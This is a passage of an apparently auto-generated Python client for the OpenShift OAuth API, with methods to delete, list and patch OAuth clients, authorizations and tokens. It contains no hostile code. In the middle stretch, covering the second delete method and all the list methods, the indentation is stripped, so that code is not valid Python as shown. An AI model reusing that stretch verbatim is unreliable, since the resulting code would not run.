        >>> thread = api.delete_oauth_openshift_io_v1_o_auth_client(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClient (required)
        :param V1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer; zero means delete immediately. If this value is nil, the default grace period for the specified type will be used.
        :param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.delete_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, **kwargs)
        else:
            (data) = self.delete_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, **kwargs)
            return data

    def delete_oauth_openshift_io_v1_o_auth_client_with_http_info(self, name, body, **kwargs):
        """
        delete an OAuthClient
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClient (required)
        :param V1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer; zero means delete immediately. If this value is nil, the default grace period for the specified type will be used.
        :param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_oauth_openshift_io_v1_o_auth_client" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `delete_oauth_openshift_io_v1_o_auth_client`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `delete_oauth_openshift_io_v1_o_auth_client`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthclients/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'grace_period_seconds' in params:
            query_params['gracePeriodSeconds'] = params['grace_period_seconds']
        if 'orphan_dependents' in params:
            query_params['orphanDependents'] = params['orphan_dependents']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='UnversionedStatus',
                                        auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_oauth_openshift_io_v1_o_auth_client_authorization(self, name, body, **kwargs):
"""
delete an OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_o_auth_client_authorization(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClientAuthorization (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer; the value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used.
:param bool orphan_dependents: Should the dependent objects be orphaned. If true, the \"orphan\" finalizer will be added to the object's finalizers list; if false, it will be removed.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, **kwargs)
else:
data = self.delete_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, **kwargs)
return data
def delete_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(self, name, body, **kwargs):
"""
delete an OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClientAuthorization (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer; the value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used.
:param bool orphan_dependents: Should the dependent objects be orphaned. If true, the \"orphan\" finalizer will be added to the object's finalizers list; if false, it will be removed.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_oauth_openshift_io_v1_o_auth_client_authorization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_oauth_openshift_io_v1_o_auth_client_authorization`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_oauth_openshift_io_v1_o_auth_client_authorization`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'grace_period_seconds' in params:
query_params['gracePeriodSeconds'] = params['grace_period_seconds']
if 'orphan_dependents' in params:
query_params['orphanDependents'] = params['orphan_dependents']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_oauth_openshift_io_v1_api_resources(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_oauth_openshift_io_v1_api_resources(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_oauth_openshift_io_v1_api_resources_with_http_info(**kwargs)
else:
data = self.get_oauth_openshift_io_v1_api_resources_with_http_info(**kwargs)
return data
def get_oauth_openshift_io_v1_api_resources_with_http_info(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_oauth_openshift_io_v1_api_resources_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_oauth_openshift_io_v1_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedAPIResourceList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_oauth_openshift_io_v1_o_auth_access_token(self, **kwargs):
"""
list or watch objects of kind OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_access_token(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthAccessTokenList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_oauth_openshift_io_v1_o_auth_access_token_with_http_info(**kwargs)
else:
data = self.list_oauth_openshift_io_v1_o_auth_access_token_with_http_info(**kwargs)
return data
def list_oauth_openshift_io_v1_o_auth_access_token_with_http_info(self, **kwargs):
"""
list or watch objects of kind OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_access_token_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthAccessTokenList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_oauth_openshift_io_v1_o_auth_access_token" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAccessTokenList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_oauth_openshift_io_v1_o_auth_authorize_token(self, **kwargs):
"""
list or watch objects of kind OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_authorize_token(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthAuthorizeTokenList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(**kwargs)
else:
data = self.list_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(**kwargs)
return data
def list_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(self, **kwargs):
"""
list or watch objects of kind OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthAuthorizeTokenList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_oauth_openshift_io_v1_o_auth_authorize_token" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthAuthorizeTokenList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_oauth_openshift_io_v1_o_auth_client(self, **kwargs):
"""
list or watch objects of kind OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_client(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthClientList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_oauth_openshift_io_v1_o_auth_client_with_http_info(**kwargs)
else:
data = self.list_oauth_openshift_io_v1_o_auth_client_with_http_info(**kwargs)
return data
def list_oauth_openshift_io_v1_o_auth_client_with_http_info(self, **kwargs):
"""
list or watch objects of kind OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_client_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthClientList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_oauth_openshift_io_v1_o_auth_client" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclients'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClientList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_oauth_openshift_io_v1_o_auth_client_authorization(self, **kwargs):
"""
list or watch objects of kind OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_client_authorization(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthClientAuthorizationList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(**kwargs)
else:
data = self.list_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(**kwargs)
return data
def list_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(self, **kwargs):
"""
list or watch objects of kind OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthClientAuthorizationList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_oauth_openshift_io_v1_o_auth_client_authorization" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClientAuthorizationList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def patch_oauth_openshift_io_v1_o_auth_access_token(self, name, body, **kwargs):
        """
        partially update the specified OAuthAccessToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_oauth_openshift_io_v1_o_auth_access_token(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAccessToken (required)
        :param UnversionedPatch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthAccessToken
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.patch_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, **kwargs)
        else:
            (data) = self.patch_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, **kwargs)
            return data

    def patch_oauth_openshift_io_v1_o_auth_access_token_with_http_info(self, name, body, **kwargs):
        """
        partially update the specified OAuthAccessToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAccessToken (required)
        :param UnversionedPatch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthAccessToken
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method patch_oauth_openshift_io_v1_o_auth_access_token" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `patch_oauth_openshift_io_v1_o_auth_access_token`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `patch_oauth_openshift_io_v1_o_auth_access_token`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'PATCH',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1OAuthAccessToken',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
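
    # Usage sketch (assumption: `api` is an instance of this class built from a
    # configured ApiClient; the token name 'mytoken' and the label below are
    # hypothetical). A plain dict body is serialized and sent with one of the
    # advertised patch Content-Types, so a partial update looks like:
    #
    #     patch = {'metadata': {'labels': {'env': 'dev'}}}
    #     token = api.patch_oauth_openshift_io_v1_o_auth_access_token('mytoken', patch)
    #
    # Passing callback= makes the call asynchronous and returns the request
    # thread instead of the deserialized object:
    #
    #     def on_done(token):
    #         pprint(token)
    #     thread = api.patch_oauth_openshift_io_v1_o_auth_access_token(
    #         'mytoken', patch, callback=on_done)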

    def patch_oauth_openshift_io_v1_o_auth_authorize_token(self, name, body, **kwargs):
        """
        partially update the specified OAuthAuthorizeToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_oauth_openshift_io_v1_o_auth_authorize_token(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
